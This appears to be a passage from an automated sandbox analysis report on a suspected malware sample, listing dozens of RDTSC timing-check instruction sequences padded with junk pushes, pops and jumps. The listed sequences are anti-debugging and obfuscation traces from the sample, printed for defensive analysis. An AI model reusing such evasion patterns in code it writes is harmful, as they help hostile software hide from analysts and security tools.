              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B859 second address: 86B870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FEF0C74E726h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B870 second address: 86B89F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FEF0C6C7667h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jng 00007FEF0C6C7664h 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B89F second address: 86B8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F835 second address: 86F839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F839 second address: 86F843 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEF0C74E726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F843 second address: 86F84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F84B second address: 86F84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F995 second address: 86F9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C765Dh 0x00000009 jnp 00007FEF0C6C7656h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F9B2 second address: 86F9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FEF0C74E739h 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FB93 second address: 86FB9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870170 second address: 870177 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8702EA second address: 870300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEF0C6C765Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875B1C second address: 875B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875B22 second address: 875B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874788 second address: 87478C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87478C second address: 8747A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7661h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87491A second address: 87491E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87491E second address: 87496F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FEF0C6C7664h 0x0000000d jmp 00007FEF0C6C7667h 0x00000012 pushad 0x00000013 jmp 00007FEF0C6C765Dh 0x00000018 jmp 00007FEF0C6C765Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874AD5 second address: 874AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FEF0C74E72Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874AE4 second address: 874B0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FEF0C6C7691h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEF0C6C7669h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874B0F second address: 874B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8754D1 second address: 8754F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEF0C6C7656h 0x0000000a jmp 00007FEF0C6C7668h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87583C second address: 875840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875840 second address: 875848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878F19 second address: 878F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BC9B second address: 87BCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 je 00007FEF0C6C765Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8801F2 second address: 8801F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8801F6 second address: 8801FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8801FA second address: 88020E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FEF0C74E726h 0x0000000e jp 00007FEF0C74E726h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88020E second address: 88023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7666h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007FEF0C6C7660h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88023F second address: 880249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88037B second address: 8803A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 push esi 0x0000000a jmp 00007FEF0C6C7667h 0x0000000f pop esi 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8803A6 second address: 8803AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880D3A second address: 880D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCAF3 second address: 7FCAF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCAF9 second address: 7FCB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FEF0C6C7669h 0x0000000b jno 00007FEF0C6C7656h 0x00000011 jmp 00007FEF0C6C765Dh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCB1A second address: 7FCB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ecx 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885F51 second address: 885F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7667h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884E1D second address: 884E26 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841A57 second address: 841A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841A5D second address: 841AD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E72Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c xor edx, 680EA501h 0x00000012 lea eax, dword ptr [ebp+1249586Ch] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FEF0C74E728h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 nop 0x00000033 jmp 00007FEF0C74E738h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FEF0C74E735h 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841AD2 second address: 8283AC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEF0C6C766Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or ecx, dword ptr [ebp+122D22C0h] 0x00000011 call dword ptr [ebp+122D346Dh] 0x00000017 pushad 0x00000018 jp 00007FEF0C6C766Bh 0x0000001e jmp 00007FEF0C6C7665h 0x00000023 jmp 00007FEF0C6C7660h 0x00000028 push edi 0x00000029 jbe 00007FEF0C6C7656h 0x0000002f jmp 00007FEF0C6C7664h 0x00000034 pop edi 0x00000035 jmp 00007FEF0C6C765Bh 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007FEF0C6C7666h 0x00000043 jmp 00007FEF0C6C7660h 0x00000048 jbe 00007FEF0C6C765Ch 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842505 second address: 842509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842509 second address: 84250F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84250F second address: 84253D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E732h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dl, ah 0x0000000e push 00000004h 0x00000010 jnp 00007FEF0C74E726h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007FEF0C74E728h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8850F6 second address: 885102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FEF0C6C7656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885102 second address: 885108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885108 second address: 88510C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88539A second address: 8853A4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEF0C74E726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8853A4 second address: 8853AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8853AF second address: 8853B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8853B4 second address: 8853BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007FEF0C6C7656h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8853BF second address: 8853C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885639 second address: 88563F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88563F second address: 885660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEF0C74E738h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885660 second address: 885664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885664 second address: 885668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885949 second address: 88594D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88594D second address: 885965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E732h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885965 second address: 885972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007FEF0C6C7656h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885972 second address: 88597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88597E second address: 885982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885982 second address: 8859AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FEF0C74E72Fh 0x0000000d jmp 00007FEF0C74E72Eh 0x00000012 jo 00007FEF0C74E72Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A20D second address: 88A229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7668h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A381 second address: 88A38D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A38D second address: 88A391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A627 second address: 88A64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FEF0C74E730h 0x0000000a jmp 00007FEF0C74E72Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88CE2B second address: 88CE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88CE2F second address: 88CE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893713 second address: 893719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893719 second address: 89371D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89371D second address: 893723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B3C second address: 893B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEF0C74E726h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B46 second address: 893B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B4C second address: 893B70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007FEF0C74E726h 0x00000009 jmp 00007FEF0C74E733h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 893B70 second address: 893BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEF0C6C7656h 0x0000000a jl 00007FEF0C6C7656h 0x00000010 popad 0x00000011 jp 00007FEF0C6C766Fh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8946F5 second address: 8946FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89735B second address: 897360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897696 second address: 8976A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89ABBF second address: 89AC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C6C7666h 0x00000009 popad 0x0000000a jo 00007FEF0C6C7665h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FEF0C6C7661h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AC04 second address: 89AC48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E738h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FEF0C74E730h 0x00000014 push eax 0x00000015 jmp 00007FEF0C74E731h 0x0000001a pop eax 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AC48 second address: 89AC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEF0C6C7666h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AED3 second address: 89AEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007FEF0C74E735h 0x0000000c jmp 00007FEF0C74E72Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89AEFC second address: 89AF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEF0C6C7656h 0x0000000a popad 0x0000000b jng 00007FEF0C6C765Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3A71 second address: 8A3A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEF0C74E726h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FEF0C74E726h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801A64 second address: 801A69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801A69 second address: 801A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1981 second address: 8A198B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1B6E second address: 8A1B8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FEF0C74E735h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FEF0C74E726h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1B8F second address: 8A1BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FEF0C6C7656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1BA3 second address: 8A1BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1BA7 second address: 8A1BAD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1D01 second address: 8A1D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1D0D second address: 8A1D19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1D19 second address: 8A1D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E739h 0x00000009 rdtsc
